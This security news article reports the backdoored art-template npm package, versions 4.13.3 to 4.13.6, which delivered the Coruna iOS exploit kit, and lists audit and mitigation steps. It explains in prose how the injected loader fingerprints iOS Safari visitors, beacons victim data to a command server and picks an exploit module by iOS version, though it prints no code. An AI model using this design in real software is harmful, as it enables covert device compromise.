Hackers Backdoor Popular art-template npm Package to Launch Watering-Hole Attacks
The art-template npm package was backdoored in a supply-chain attack delivering the Coruna iOS exploit kit, turning any site using the compromised package into a watering hole for Apple device owners.
A widely-used JavaScript templating library called art-template has been weaponized to deliver a sophisticated iOS browser exploit kit through a supply chain attack. The backdoored package silently dropped malicious code into end users' browsers, turning everyday web applications into watering holes targeting Apple device owners worldwide.
The attack began when the art-template npm package, originally developed by a maintainer known as "aui," was handed over to an unknown actor under the pretense of continuing its maintenance. According to the original author, the new controller almost immediately began weaponizing the package. Issue reports flagging the suspicious behavior were quietly deleted while the attacker continued pushing malicious versions to suppress discovery.
Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified the campaign and linked it to a previously documented iOS exploit framework called the Coruna exploit kit. Their analysis, titled "Coruna Respawned," revealed the implant inside the backdoored package closely mirrors delivery patterns from that earlier framework, suggesting direct reuse or a near-identical derivative.
The backdoored versions followed an escalating injection pattern across multiple releases. Version 4.13.3 used encoding to hide a loader pointing to a suspicious external domain. Versions 4.13.5 and 4.13.6 dropped the obfuscation entirely and injected a plaintext script loader directly into the package's browser bundle file. Any web application that included those versions would silently load and execute the exploit kit in every visitor's browser.
The core of the attack is a JavaScript implant that functions as a watering hole exploit delivery framework. Once injected through the compromised npm package, it quietly fingerprints each site visitor. The implant only activates on Safari running on iOS 11.0 through 17.2, and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher. Once a matching device is detected, the implant begins beaconing the victim's public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds.
Payload selection is tailored to the victim's iOS version, with each of five version bands mapping to a different remote exploit module. Researchers found the hard cutoff at iOS 17.3 aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed at that exact release. That precision strongly suggests browser-level exploitation rather than conventional phishing.
Developers are urged to audit dependency trees for art-template versions 4.13.3 through 4.13.6. Locking dependencies, reviewing browser bundle outputs for unexpected script loaders, and monitoring outbound network requests from JavaScript runtimes are the primary mitigations. Any application deployed with affected versions should undergo an immediate security review.